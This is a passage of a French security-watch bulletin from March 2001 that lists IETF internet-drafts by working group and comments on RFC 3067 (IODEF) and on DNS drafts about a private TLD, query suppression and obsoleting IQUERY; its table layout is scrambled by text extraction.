Generalized Switch Management Protocol (gsmp)
SIP-H.323 Interworking
H.323 URL scheme definition
IANA Guidelines for IPv4 Multicast Address Allocation
ICAP the Internet Content Adaptation Protocol
Intention-Driven ICMP Trace-Back
iFCP Encapsulation Goals and Requirements
IGMP Mixed Version Proxying
Using IGMPv3 For Source-Specific Multicast
Internet Group Management Protocol, Version 3
IGMPv3 and Multicast Routing Protocol Interaction
IMAP ANNOTATE Extension
IMAP4 SEARCHM Command for Multiple Mailboxes
IMAP4 Channel Transport Mechanism
SIP Extensions for Instant Messaging
SIP Extensions for Presence
Requirements for the Dynamic Partitioning of Network Elements
.xxx Considered Dangerous
Advice for Internet Subnetwork Designers
IETF Code of Conduct
SeaMoby Micro Mobility Problem Statement
Requirements for Separation of IP Control and Forwarding
IPv6 well known address for a 6to4 router
IPv6 Near-Unique Site-Local Addresses
Buffer Management for Smooth Handovers in IPv6
Source-Specific Multicast for IP
IP Version 6 Addressing Architecture
A flex. method for mana. the assig. of bites of IPv6 address block
IP Version 6 Scoped Address Architecture
Traffic Engineering & QoS Methods for IP ATM & Based Multiservi.
An analysis of IPv6 anycast
Interaction of transition mechanisms
IP over Optical Networks - A Framework
Port based Virtual Private LAN services for IP only data networks
Delegation of IP6.ARPA
Internet Personal Appliances Control (IPAC) Discussion
Closed-Loop Automatic Link Provisioning
Page 19/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
IPP
IPPM
IRML
ISCSI
ISIS
ISNS
ISSLL
ITRIP
L2TP
LDAP
LMP
LSP
MBONED
MIB
MIDCOM
MIME
MLD
MLPP
MOBILEIP
MPLS
draft-lin-ccamp-ipo-common-label-request-00
draft-ietf-ipp-indp-method-04
draft-ietf-ipp-install-02
draft-ietf-ipp-notify-get-02
draft-ietf-ippm-btc-framework-05
draft-ietf-ippm-ipdv-07
draft-beck-opes-irml-00
draft-bakke-iscsimib-02
draft-cavanna-iscsi-crc-vs-cksum-01
draft-ietf-ips-iscsi-05
draft-ietf-ips-iscsi-boot-02
draft-ietf-ips-iscsi-name-disc-00
draft-ietf-isis-wg-multi-topology-00
draft-ietf-ips-isns-01
draft-ietf-issll-ds-map-01
draft-walker-iptel-trip-tns-01
draft-bourdon-l2tpmulticast-00
draft-ietf-l2tpext-ds-03
draft-vasavada-l2tpext-fr-svctype-00
draft-ietf-ldapbis-dn-01
draft-ietf-ldapbis-protocol-01
draft-dubuc-lmp-mib-01
draft-fredette-lmp-wdm-01
draft-papadimitriou-enhanced-lsps-03
draft-ietf-mboned-mcast-apps-02
draft-ietf-mmusic-mbus-transport-04
draft-kutscher-mbus-ipac-00
draft-anderson-gsmp-swpart-mib-00
draft-huynh-disman-conditionmib-00
draft-ietf-disman-alarm-mib-01
draft-ietf-disman-itualarm-mib-01
draft-ietf-disman-schedule-mib-v2-03
draft-ietf-disman-script-mib-v2-02
draft-ietf-disman-snmp-alarm-mib-00
draft-ietf-ipfc-fcmgmt-int-mib-06
draft-lam-disman-arcmib-00
draft-stewart-atommib-opticalmib-02
draft-ietf-midcom-requirements-00
draft-eastlake-cturi-02
draft-vida-mld-v2-00
draft-polk-mlpp-over-ip-00
draft-chaskar-mobileip-qos-01
draft-choi-mobileip-ldpext-01
draft-gwon-mobileip-l3mp-mipv4-00
draft-ietf-mobileip-hmipv6-02
draft-ietf-mobileip-lowlatency-handoffs-v4-00
draft-ietf-mobileip-reg-tunnel-04
draft-ietf-mobileip-rfc2002-bis-04
draft-koodli-mobileip-fastv6-02
draft-krishnamurthi-mobileip-buffer6-01
draft-malinen-mobileip-reg6fwd-00
draft-malinen-mobileip-regreg6-01
draft-manner-seamoby-terms-01
draft-nikander-mobileip-homelessv6-01
draft-subbarao-mobileip-multipleip-00
draft-subbarao-mobileip-resource-00
draft-tsao-mobileip-dualstack-model-02
draft-dubuc-mpls-bundle-mib-00
draft-harrison-mpls-oam-00
draft-ietf-isis-gmpls-extensions-02
draft-ietf-mpls-cr-ldp-05
draft-ietf-mpls-crldp-unnum-01
draft-ietf-mpls-crlsp-modify-03
draft-ietf-mpls-generalized-cr-ldp-01
draft-ietf-mpls-generalized-rsvp-te-01
draft-ietf-mpls-generalized-signaling-02
draft-ietf-mpls-lmp-02
draft-ietf-mpls-lsp-hierarchy-02
draft-ietf-mpls-recovery-frmwrk-02
draft-ietf-mpls-rsvp-unnum-01
draft-ietf-mpls-te-mib-06
draft-kompella-mpls-bundle-05
draft-kompella-mpls-multiarea-te-01
draft-kompella-mpls-rsvp-constraints-00
draft-kompella-ospf-gmpls-extensions-01
draft-lang-ccamp-recovery-00
draft-lee-mpls-te-exchange-01
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
27/02
07/03
02/03
07/03
01/03
02/03
28/02
06/03
07/03
02/03
01/03
27/02
27/02
02/03
01/03
26/02
26/02
01/03
26/02
01/03
26/02
27/02
06/03
08/03
05/03
28/02
28/02
26/02
27/02
05/03
05/03
05/03
05/03
27/02
28/02
26/02
06/03
28/02
05/03
26/02
28/02
07/03
28/02
27/02
05/03
26/02
07/03
05/03
08/03
08/03
08/03
08/03
05/03
06/03
26/02
26/02
02/03
28/02
26/02
02/03
02/03
06/03
01/03
07/03
07/03
07/03
06/03
06/03
05/03
06/03
08/03
02/03
06/03
27/02
02/03
27/02
07/03
Common Label & Label Requ. Specific. for Auto. Swit. Trans. Net.
IPP: The INDP Notification Delivery Method and Protocol/1.0
IPP: Printer Installation Extension
IPP: The 'ippget' Delivery Method for Event Notifications
A Framework for Defining Empirical Bulk Transfer Capacity Metrics
IP Packet Delay Variation Metric for IPPM
IRML: A Rule Specification Language for Intermediary Services
Definitions of Managed Objects for SCSI over TCP
iSCSI Digests – CRC or Checksum?
ISCSI
A Standard for BootStrapping Clients using the iSCSI Protocol
ISCSI Naming and Discovery Requirements
M-ISIS: Multi Topology Routing in IS-IS
ISNS Internet Storage Name Service
Integrated Service Mappings for Differentiated Services Networks
TRIP Transit Network Selection
L2TP Multicast Extension
L2TP IP Differentiated Services Extension
Frame Relay Service Type for L2TP
LDAP V3: UTF-8 String Representation of Distinguished Names
LDAP V3
Link Management Protocol MIB Using SMIv2
Link Management Protocol (LMP) for WDM Transmission Systems
Enhanced LSP Services
IP Multicast Applications: Challenges and Solutions
A Message Bus for Local Coordiantion
An Mbus Profile for Internet Appliance Control
Switch Partitioning MIB
CONDITION MIB
Alarm MIB
ITU Alarm MIB
Definitions of Managed Objects for Scheduling Mgmt Operations
Definitions of Managed Objects for the Delegation of Mgmt Scripts
SNMP Alarms and MIB Module
Fibre Channel Management Framework Integration MIB
Alarm Reporting Control MIB
Definitions of Managed Objects for the Optical Interface Type
Requirements for the MIDCOM architecture and control language
Mapping Between MIME Types, Content-Types and URIs
Multicast Listener Discovery Version 2 (MLDv2) for IPv6
Multi-Level Precedence and Preemption over IP
A Framework for QoS Support in Mobile IPv6
Extension of LDP for Mobile IP Service through the MPLS Network
Network Layer Triggered Mobile IPv4 Predictive Handoff
Hierarchical MIPv6 mobility management
Low latency Handoffs in Mobile IPv4
Mobile IP Regional Registration
IP Mobility Support for IPv4, revised
Fast Handovers in Mobile Ipv6
Buffer Management for Smooth HandOvers in Mobile IPv6
Mobile IPv6 Regional Forwarding
Mobile IPv6 Regional Registrations
Mobility Related Terminology
Homeless Mobile IPv6
Mobile IP NAI with Multiple Static IP Address Flows
Releasing Resources in Mobile IP
Mobility Supp. for IPv4 & v6 Interc. Net. based on Dual-Stack Mod
Link Bundling Information Base Using SMIv2
OAM Functionality for MPLS Networks
IS-IS Extensions in Support of Generalized MPLS
Constraint-Based LSP Setup using LDP
Signalling Unnumbered Links in CR-LDP
LSP Modification Using CR-LDP
Generalized MPLS Signaling - CR-LDP Extensions
Generalized MPLS Signaling - RSVP-TE Extensions
Generalized MPLS - Signaling Functional Description
Link Management Protocol (LMP)
LSP Hierarchy with MPLS TE
Framework for MPLS-based Recovery
Signalling Unnumbered Links in RSVP-TE
MPLS Traffic Engineering MIB Using SMIv2
Link Bundling in MPLS Traffic Engineering
Multi-area MPLS Traffic Engineering
Carrying Constraints in RSVP
OSPF Extensions in Support of Generalized MPLS
Generalized MPLS Recovery Mechanisms
Distributed Route Exchangers
Page 20/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
MSDP
MSEC
MSNIP
MTQP
NAMED
NFS
NGTRANS
NMRG
NTIP
OLCP
OLSR
OMML
OPES
OPTICAL
OSPF
PACKET
PARO
PCAP
PIM
POLICY
POP
PPP
PRIM
PROTO
REQUEST
RFC2011
RFC2012
RFC2013
RFC2096
RMON
RMT
ROHC
RSP
RSVP
RTCP
RTP
draft-nadeau-mpls-ds-te-mib-00
draft-osu-ipo-mpls-issues-01
draft-rekhter-mpls-over-gre-01
draft-satoru-mpls-1hop-lsp-00
draft-worster-mpls-in-ip-04
draft-xu-ccamp-gmpls-sig-reorg-00
draft-ietf-msdp-mib-05
draft-ietf-msdp-traceroute-05
draft-ietf-msec-gdoi-00
draft-ietf-idmr-msnip-00
draft-ietf-msgtrk-mtqp-02
draft-howard-named-object-00
draft-ietf-nfsv4-rpc-ipv6-00
draft-ietf-ngtrans-bgp-tunnel-01
26/02
07/03
28/02
26/02
02/03
26/02
02/03
02/03
26/02
27/02
07/03
28/02
28/02
05/03
draft-ietf-ngtrans-introduction-to-ipv6-transition-06
06/03
draft-irtf-nmrg-snmp-tcp-06
05/03
draft-sahay-ccamp-ntip-00
26/02
draft-chiu-strand-unique-olcp-02
02/03
draft-ietf-manet-olsr-04
06/03
draft-maciocco-opes-omml-00
27/02
draft-yang-opes-rule-processing-service-execution-00 27/02
draft-banerjee-routing-impairments-00
26/02
draft-ghani-optical-rings-01
07/03
draft-guo-optical-mesh-ring-01
07/03
draft-krishnaswamy-optical-rsvp-extn-00
27/02
draft-many-optical-restoration-00
27/02
draft-poj-optical-multicast-00
28/02
draft-giacalone-te-optical-next-02
02/03
draft-ietf-ospf-abr-alt-04
06/03
draft-ietf-ospf-dc-01
06/03
draft-ietf-ospf-floodgates-01
26/02
draft-ietf-ospf-isis-flood-opt-01
06/03
draft-ietf-ospf-oob-resync-01
06/03
draft-ietf-ospf-ppp-flood-01
01/03
draft-ietf-ospf-restart-01
06/03
draft-ietf-ospf-scalability-00
01/03
draft-ma-ospf-isis-te-00
27/02
draft-pillay-esnault-ospf-flooding-03
06/03
draft-pbh-packet-optical-escalation-00
27/02
draft-gomez-paro-manet-00
27/02
draft-bullard-pcap-01
01/03
draft-ietf-pim-bidir-02
07/03
draft-ietf-pim-sm-bsr-00
27/02
draft-ietf-pim-sm-v2-new-02
07/03
draft-ietf-policy-terminology-02
02/03
draft-gellens-pop-err-01
01/03
draft-brucet-pppext-ppp-over-aal2-class-00
27/02
draft-ietf-pppext-ppp-over-aal2-00
05/03
draft-mazzoldi-prim-impp-01
05/03
draft-eastlake-proto-doc-pov-02
01/03
draft-cain-request-routing-req-01
05/03
draft-ops-rfc2011-update-00
27/02
draft-ops-rfc2012-update-00
27/02
draft-ops-rfc2013-update-00
27/02
draft-ops-rfc2096-update-00
27/02
draft-ietf-rmonmib-apm-mib-03
07/03
draft-ietf-rmonmib-hcrmon-06
07/03
draft-ietf-rmonmib-tokenring-01
07/03
draft-ietf-rmt-author-guidelines-01
06/03
draft-ietf-rmt-bb-pgmcc-00
27/02
draft-ietf-rmt-bb-track-01
07/03
draft-ietf-rmt-bb-tree-config-02
07/03
draft-ietf-rmt-pi-norm-01
08/03
draft-ietf-rohc-over-ppp-01
05/03
draft-ietf-rohc-rtp-09
28/02
draft-ietf-rohc-tcp-epic-00
26/02
draft-price-rohc-epic-compatibility-00
26/02
draft-price-rohc-epic-sctp-00
26/02
draft-ietf-rserpool-reqts-01
01/03
draft-cai-vc-rsvp-te-00
27/02
draft-ietf-issll-rsvp-aggr-03
28/02
draft-chesterfield-avt-rtcpssm-00
27/02
draft-wenger-avt-rtcp-feedback-02
08/03
draft-curet-avt-rtp-mpeg4-flexmux-00
26/02
draft-ietf-avt-dv-audio-03
08/03
draft-ietf-avt-profile-interop-05
06/03
draft-ietf-avt-profile-new-10
08/03
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Diff-Serv-aware MPLS Traffic Engine. Network MIB Using SMIv2
IP over Optical Networks: A Summary of Issues
MPLS Label Stack Encapsulation in GRE
TTL Processing expansion for 1-hop LSP
MPLS Label Stack Encapsulation in IP
Mods and Reorg. to GMPLS Signaling Functional Specification
Multicast Source Discovery protocol MIB
MSDP Traceroute
The Group Domain of Interpretation
Multicast Source Notification of Interest Protocol (MSNIP)
Message Tracking Query Protocol
A Structural Object Class for Arbitrary Auxiliary Object Classes
IPv6 extension to RPC
Connecting IPv6 Domains across IPv4 Clouds with BGP
On overviewof the Introduction of IPv6 in the Internet
SNMP over TCP Transport Mapping
NTIP for Photonic Cross Connects (PXC)
Unique Features and Requir. for The Optical Layer Control Plane
Optimized Link State Routing Protocol
OMML: OPES Meta-data Markup Language
OPES Architecture for Rule Processing and Service Execution
Impairment Constraints for Routing in All-Optical Networks
Architect. Framw. for Automatic Protect. Provision. In Dyna. Opt…
Hybrid Mesh-Ring Optical Networks and Their Routing Information
Lightpath Route Extensions to RSVP-TE for optical channel conn.
Restoration Mechanisms and Signaling in Optical Networks
Optical Multicast – A Framework
Network Engineering Extensions (NEXT) for OSPFv3
Alternative OSPF ABR Implementations
Detecting Inactive Neighbors over OSPF Demand Circuits
OSPF Floodgates
Flooding optimizations in link-state routing protocols
OSPF Out-of-band LSDB resynchronization
Flooding over parallel point-to-point links
OSPF Restart Signaling
Explicit Marking and Prioritized Treatment of Specific IGP Pack …
Using 2 Octets for Bandwidth Values in OSPF and ISIS extensions
OSPF Refresh and flooding reduction in stable topologies
Packet-Optical Escalation Strategies
PARO: A Power-Aware Routing Optimization Scheme for Mobile ..
Remote Packet Capture
Bi-directional Protocol Independent Multicast
Bootstrap Router (BSR) Mechanism for PIM Sparse Mode
PIM - Sparse Mode PIM-SM): Protocol Specification (Revised)
Terminology
The SYS and AUTH POP Response Codes
Class Extensions for PPP over AAL2
PPP over AAL2
Presence and Instant Messaging Protocol (PRIM)
Protocol versus Document Points of View
Request Routing Requirements for Content Internetworking
MIB for the Internet Protocol (IP)
MIB for the Transmission Control Protocol (TCP)
MIB for the User Datagram Protocol (UDP)
IP Forwarding Table MIB
Application Performance Measurement MIB
Remote Network Monitoring MIB for High Capacity Networks
Token Ring Extensions to the Remote Network Monitoring MIB
Author Guidelines for RMT Building Blocks & Protocol Instantiat..
PGMCC single rate multicast conge. control: Protocol Specification
RMT Building Block for TRACK
RMT Building Block: Tree Auto-Configuration
NACK-Oriented Reliable Multicast Protocol (NORM)
ROHC over PPP
Robust Header Compression (ROHC)
Robust TCP/IP Compression Using EPIC
Generating a ROHC 08 Compatible Profile Using EPIC
Robust SCTP/IP Compression Using EPIC
Requirements for Reliable Server Pooling
Signaling Virtual Circuit Label Using RSVP-TE
RSVP Reservations Aggregation
RTCP Extension for Source Specific Multicast Sessions
RTCP-based Feedback: Concepts and Message Timing Rules
RTP Payload Format for MPEG-4 FlexMultiplexed Streams
RTP Payload Format for 12bit DAT, 20 & 24bit Linear Sampl. Audio
RTP Audio/Video Profile Interoperability Statement
RTP Profile for Audio and Video Conferences with Minimal Control
Page 21/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
SCCP
SCTP
SDP
SIGTRAN
SIP
SMIME
SMING
SMTP
SNMP
SONET
SRLG
SSPM
TBRPF
TCP
TDM
TE
TRADE
TRIP
TSVWG
UDPLITE
ULP
URN
UTF8
VOIP
VPIM
VPN
WCIP
WEDAV
draft-ietf-avt-rtcp-bw-03
draft-ietf-avt-rtp-amr-05
draft-ietf-avt-rtp-interop-07
draft-ietf-avt-rtp-mime-04
draft-ietf-avt-rtp-new-09
draft-ietf-avt-rtp-selret-01
draft-ietf-avt-uxp-00
draft-moffitt-vorbis-rtp-00
draft-ietf-mmusic-sccp-01
draft-leung-sigtran-stream-sctp-00
draft-stewart-sctpsocket-sigtran-02
draft-andreasen-mmusic-sdp-simcap-01
draft-ietf-mmusic-sdp-new-01
draft-ietf-sigtran-m2pa-02
draft-ietf-sigtran-m3ua-06
draft-ietf-sigtran-sctp-mib-03
draft-campbell-sip-cc-framework-02
draft-dcsgroup-sip-arch-04
draft-dcsgroup-sip-proxy-proxy-04
draft-ietf-sip-100rel-03
draft-ietf-sip-call-auth-01
draft-ietf-sip-call-flows-03
draft-ietf-sip-cc-transfer-04
draft-ietf-sip-guidelines-02
draft-ietf-sip-isup-mime-08
draft-ietf-sip-manyfolks-resource-01
draft-ietf-sip-mib-02
draft-ietf-sip-serverfeatures-04
draft-ietf-sip-service-examples-01
draft-ietf-sip-state-01
draft-jfp-sip-isup-header-00
draft-jfp-sip-servicecodes-00
draft-levin-sip-for-video-00
draft-mule-sip-t38callflows-01
draft-polk-sip-mlpp-mapping-01
draft-rosenberg-sip-3pcc-02
draft-rosenberg-sip-app-components-01
draft-vemuri-sip-t-context-02
draft-ietf-smime-ecc-03
draft-ietf-sming-01
draft-ietf-sming-inet-modules-01
draft-ietf-sming-modules-01
draft-ietf-sming-reqs-00
draft-ietf-sming-snmp-01
draft-melnikov-smtp-lang-03
draft-ietf-ops-rowpointer-tc-01
draft-ietf-snmpconf-bcp-04
draft-ietf-snmpv3-arch-v2-00
draft-ietf-snmpv3-mpd-v2-00
draft-ietf-atommib-sonetaps-mib-03
draft-malis-sonet-ces-mpls-03
draft-many-inference-srlg-00
draft-cole-sspm-02
draft-ietf-manet-tbrpf-01
draft-allman-tcp-abc-01
draft-ietf-pilc-asym-03
draft-anavi-tdmoip-01
draft-ash-ccamp-multi-area-te-reqmts-00
draft-many-tewg-te-applicability-00
draft-wlai-tewg-measure-00
draft-ietf-trade-iotp2-req-00
draft-zinman-trip-mib-01
draft-ietf-tsvwg-ecn-02
draft-ietf-tsvwg-ecn-ip-00
draft-ietf-tsvwg-tcp-eifel-alg-00
draft-ietf-tsvwg-tfrc-01
draft-larzon-udplite-04
draft-williams-tcpulpframe-00
draft-ietf-urn-rfc2611bis-02
draft-skwan-utf8-dns-05
draft-dobrowolski-voip-cm-01
draft-ietf-vpim-cc-03
draft-ietf-vpim-ivm-goals-01
draft-kb-ppvpn-l2vpn-motiv-00
draft-scandariato-ppvpn-info-model-00
draft-danli-wrec-wcip-01
draft-ietf-deltav-versioning-14
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
08/03
01/03
06/03
08/03
08/03
05/03
27/02
26/02
05/03
05/03
05/03
05/03
07/03
02/03
05/03
01/03
06/03
02/03
01/03
07/03
01/03
02/03
28/02
07/03
01/03
01/03
02/03
28/02
02/03
01/03
27/02
28/02
26/02
02/03
08/03
07/03
09/03
02/03
06/03
07/03
07/03
07/03
27/02
07/03
08/03
06/03
08/03
27/02
27/02
02/03
01/03
26/02
28/02
06/03
02/03
05/03
02/03
27/02
27/02
27/02
27/02
05/03
02/03
27/02
26/02
07/03
28/02
27/02
02/03
02/03
02/03
05/03
01/03
28/02
26/02
02/03
26/02
SDP Bandwidth Modifiers for RTCP Bandwidth
RTP payload format for AMR
RTP Interoperability Statement
MIME Type Registration of RTP Payload Formats
RTP: A Transport Protocol for Real-Time Applications
RTP Retransmission Payload Format
An RTP Payload Format for Erasure-Resilient Trans. of Prog. Mult.
RTP Payload Format for Vorbis Encoded Audio
Simple Conference Control Protocol
SCTP Stream Function Extensions
SCTP Sockets Mapping
SDP Simple Capability Negotiation
SDP: Session Description Protocol
SS7 MTP2-User Peer-to-Peer Adaptation Layer
SS7 MTP3-User Adaptation Layer (M3UA)
Stream Control Transmission Protocol MIB using SMIv2
Framework for SIP Call Control Extensions
Architectural Considerations for Providing Carrier Class Telephony
SIP proxy-to-proxy ext. for supporting Distributed Call State
Reliability of Provisional Responses in SIP
SIP Extensions for Media Authorization
SIP Telephony Call Flow Examples
SIP Call Control
Guidelines for Authors of SIP Extensions
MIME media types for ISUP and QSIG Objects
Integration of Resource Management and SIP
Management Information Base for Session Initiation Protocol
The SIP Supported Header
SIP Service Examples
SIP Extensions for supporting Distributed Call State
Mapping of ISUP parameters to SIP headers in SIP-T
A Model for Service Invocation in SIP using ServiceCodes
SIP Requirements for support of Multimedia and Video
SIP T.38 Call Flow Examples And Best Current Practice
SIP Precedence mapping to MLPP Interworking
Third Party Call Control in SIP
An Application Server Component Architecture for SIP
SIP for Telephones (SIP-T): Context and Architectures
Use of ECC Algorithms in CMS
SMIng - Next Generation Structure of Management Information
SMIng Internet Protocol Core Modules
SMIng Core Modules
SMIng Requirements
SMIng Mappings to SNMP
SMTP Language Extension
SNMP Textual Convention for Reusable Conceptual Rows
Configuring Networks and Devices with SNMP
An Architecture for Describing SNMP Management Frameworks
Message Processing and Dispatching for SNMP
Definitions of Managed Objects for SONET Linear APS Architect.
SONET/SDH Circuit Emulation Service Over MPLS (CEM) Encaps.
Inference of Shared Risk Link Groups
A Framework for Synthetic Sources for Performance Monitoring
Topology Broadcast based on Reverse-Path Forwarding (TBRPF)
TCP Congestion Control with Appropriate Byte Counting
TCP Performance Implications of Network Asymmetry
TDM over IP
Requirements for Multi-Area TE
Applicability Statement for Traffic Engineering with MPLS
A Framework for Internet Traffic Measurement
Internet Open Trading Protocol Version 2 Requirements
Management Information Base for Telephony Routing over IP
The Addition of Explicit Congestion Notification (ECN) to IP
An Open ECN Service in the IP layer
The Eifel Algorithm for TCP
TCP Friendly Rate Control (TFRC):Protocol Specification
The UDP Lite Protocol
ULP Framing for TCP
URN Namespace Definition Mechanisms
Using the UTF-8 Character Set in the Domain Name System
Internet-based Service Creation and the Need for a VoIP Call Mod.
Critical Content of Internet Mail
Goals for Internet Voice Mail
Whither Layer 2 VPNs?
An Information Model for Provider Provisioned VPN
WCIP: Web Cache Invalidation Protocol
Versioning Extensions to WebDAV
Page 22/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
XCAST
draft-ooms-xcast-basic-spec-01
YEUNG
draft-katz-yeung-ospf-traffic-04
ZEROCON draft-ietf-zeroconf-ipv4-linklocal-02
draft-ietf-zeroconf-reqts-07
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
05/03
01/03
05/03
07/03
Explicit Multicast (Xcast) Basic Specification
Traffic Engineering Extensions to OSPF
Dynamic Configuration of IPv4 link-local addresses
ZeroConf Requirements
Page 23/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
NOS COMMENTAIRES
LES RFC
RFC 3067
TERENA'S Incident Object Description and Exchange Format Requirements
Le RFC 3067 résulte de la contribution de l'association TERENA - Trans-European Research Education Networking
Association - aux travaux de standardisation menés dans le domaine de la détection d'intrusion et des mécanismes
d'alerte. Cette association fédère, et dans certains cas finance, divers projets de recherche intéressant les réseaux
européens de la recherche et de l'éducation. Elle anime certaines activités visant à normaliser les moyens et les
infrastructures communes. Ces activités sont menées au sein de comités spécialisés (TaskForce ou TF).
Le comité TF-CSIRT est ainsi chargé de promouvoir la collaboration entre les CSIRT (Computer Security Incident
Response Teams) Européens en animant un forum de discussion, en définissant les services pilotes pour les CSIRT
Européens et en assurant la promotion des standards et procédures de gestion des incidents.
Le groupe travail ITDWG (Incident Taxonomy and Description
Working Group) a été constitué dans l'optique d'établir un modèle
générique de description d'un incident exploitable par l'ensemble
des CSIRT.
Ce modèle, dénommé IODEF (Incident Object Description &
Exchange Format), a été formalisé puis décrit au moyen d'un DTD
XML en tenant compte des travaux menés par le groupe IDWG
(Intrusion Detection) de l'IETF.
Ainsi, une compatibilité ascendante a été recherchée permettant
d'inclure un objet conforme au modèle IDMEF (Intrusion
Detection Message Exchange Format) - cf rapports N°9 Avril 1999
et N°16 Novembre 1999 - dans une description IODEF.
Le RFC 3067 décrit en détail les exigences liées au modèle
IODEF dont notamment la signification sémantique des termes
employés.
Notons que la sémantique retenue privilégie volontairement la
lisibilité 'humaine' au détriment de la facilité d'analyse
automatique:
"IODEF is a human oriented format for Incident description, and
IODEF description should be capable of being read by humans.
The use of automatic parsing tools is foreseen but should not be
critically necessary."
Les définitions proposées - Attack, Attacker, Damage, Event,
Evidence, Incident, Impact, Target, Victim et Vulnerability - sont
claires et précises.
Nous ne pouvons que regretter l'absence d'une proposition de
traduction de cette terminologie dans les autres langues de la
communauté Européen dont, en particulier, le Français.
ftp://ftp.isi.edu/in-notes/rfc3067.txt
LES DRAFTS
DRAFT-COFFEYSTRAIN-DNSEXT-PRIVATEDNSTLD-00
DNS TLD For Private Networks
Intitulé 'DNS Top Level Domain for Private Networks', cette proposition de standard répond à une préoccupation
de plus en plus souvent rencontrée dans les entreprises: la cohabitation de deux systèmes de noms, l'un destiné à
être publié sur l'Internet, l'autre réservé à une visibilité interne.
Trois méthodes peuvent être utilisées qui sont brièvement récapitulées par les auteurs du Draft:
1. L'utilisation d'un même nom de domaine conduisant à devoir mettre en place un mécanisme physique ou logique
d'isolation, mécanisme toujours complexe et susceptible de défaillances.
2. L'utilisation de deux noms différents, le nom interne devant être habilement sélectionné afin de ne pas entrer en
conflit avec un nom par ailleurs réservé et donc enregistré sur l'Internet. Cependant, et quelque soit le nom
choisi, il est probable que celui-ci entre tôt ou tard en conflit avec un nom enregistré. Notons à ce propos, qu'il
n'est pas possible de réserver un nom de domaine sans que celui-ci soit inscrit dans les DNS Internet.
3. L'utilisation d'une racine (TLD) non utilisée dans l'infrastructure DNS Internet. Idéalement, ce TLD devrait être
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 24/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
tel que l'on puisse avoir la garantie qu'il ne soit jamais enregistré et utilisé par un tiers.
Cette dernière méthode est de loin la plus efficace bien qu'imposant une légère contrainte aux utilisateurs devant
utiliser un TLD spécifique en interne. En conséquence, les auteurs du document propose la réservation du TLD '.pri'.
Un serveur DNS interne de l'entreprise pourra alors être configuré pour être autoritaire sur la racine '.pri' et les
domaines sous-jacents, les autres domaines étant alors résolus par le biais des serveurs DNS de l'Internet.
ftp://ftp.nordu.net/internet-drafts/draft-coffeystrain-dnsext-privatednstld-00.txt
DRAFT-ESIBOV-DNSOP-SUPPRESS-QUERIES-00
Suppressing DNS queries
Complémentaire du draft 'DNS TLD For Private Networks' commenté précédemment, ce document vise à mettre
en place, voir imposer, un mécanisme de filtrage des requêtes portant sur les TLD réservés par le RFC 2606 (.test,
.example, .invalid, .localhost) ou proposés à la réservation (.pri). A cette fin, les serveurs DNS de l'Internet
devront être systématiquement configurés comme serveurs primaires sur ces zones.
ftp://ftp.nordu.net/internet-drafts/draft-esibov-dnsop-suppress-queries-00.txt
DRAFT-IETF-DNSEXT-OBSOLETE-IQUERY-00
Obsoleting IQUERY
Le RFC 1035 ' Domain Names - Implementation and Specification' définit une requête - IQUERY (OpCode =
1) - permettant d'obtenir le nom d'un système à partir de son adresse IP, opération habituellement dénommée
'requête inverse' ou 'Reverse Mapping'.
Le traitement de cette requête conduit à devoir
IQUERY
effectuer une recherche exhaustive dans les bases du
? 194.2.187.187.
DNS à partir de la racine, la seule clef exploitable à ce
niveau étant le nom du domaine.
1,n
1,n
Actuellement, toutes les implémentations documentées
utilisent un mécanisme basé sur l'inversion du DNS
.com
1,n
défini dans le même RFC 1035. Une requête DNS
1,n
'classique' mais contenant une adresse IP en lieu et
.fr
place du nom de domaine est effectuée vers le domaine
1,n
dédié 'in-addr.arpa'. L'adresse devient ici une clef
permettant d'accélérer notablement la recherche.
.apogee
L'abandon définitif et officiel du mécanisme IQUERY
.nnn xxx.yyy.zzz.ttt
.veille 194.2.187.187
dans DNSEXT est donc à considérer d'autant que celuici est potentiellement exploitable pour ,non seulement
1,n
générer un déni de service, mais aussi obtenir le
contenu d'une zone.
Le RFC 1035 reste un document de référence ayant
? 187.187.2.194
fait l'objet de très nombreux additifs (RFC 1101, 1183,
.in-addr.arpa
1348, 1876, 1982, 1995, 1996, 2065, 2136, 2137,
.in-addr.arpa
2181, 2308, 2535 et 2845 !) mais n'ayant jamais été
remplacé.
L'IETF propose donc de modifier celui-ci en ajoutant le
paragraphe
.194
"Inverse queries using the IQUERY opcode were
.194.2
originally described as the ability to look up the
names that are associated with a particular RR. Their
.194.2.187
implementation was optional and never achieved
194.2.187.187 veille
widespread use. Therefore IQUERY is now obsolete,
and name servers SHOULD return a "Not
Illustrations destinées à présenter les grands principes et non représentatives des échanges et de l’infrastructure réelle
© Apogée Communications
Implemented" error when an IQUERY request is
received."
Notons que "l'inutilité" de cette fonctionnalité 'optionnelle' peut expliquer que de nombreuses erreurs de codages
aient pu être mises à profit (cf CERT CA-98.05) sur les différentes implémentations du DNS !
ftp://ftp.nordu.net/internet-drafts/draft-ietf-dnsext-obsolete-iquery-00.txt
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 25/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
ALLEER
RT
TE
ES
SE
ET
T AT
TT
TA
AQ
QU
UE
ES
S
ALERTES
GUIDE DE LECTURE
La lecture des avis publiés par les différents organismes de surveillance ou par les constructeurs n’est pas
toujours aisée. En effet, les informations publiées peuvent être non seulement redondantes mais aussi
transmises avec un retard conséquent par certains organismes. Dès lors, deux alternatives de mise en
forme de ces informations peuvent être envisagées :
Publier une synthèse des avis transmis durant la période de veille, en classant ceux-ci en fonction de
l’origine de l’avis,
Publier une synthèse des avis transmis en classant ceux-ci en fonction des cibles.
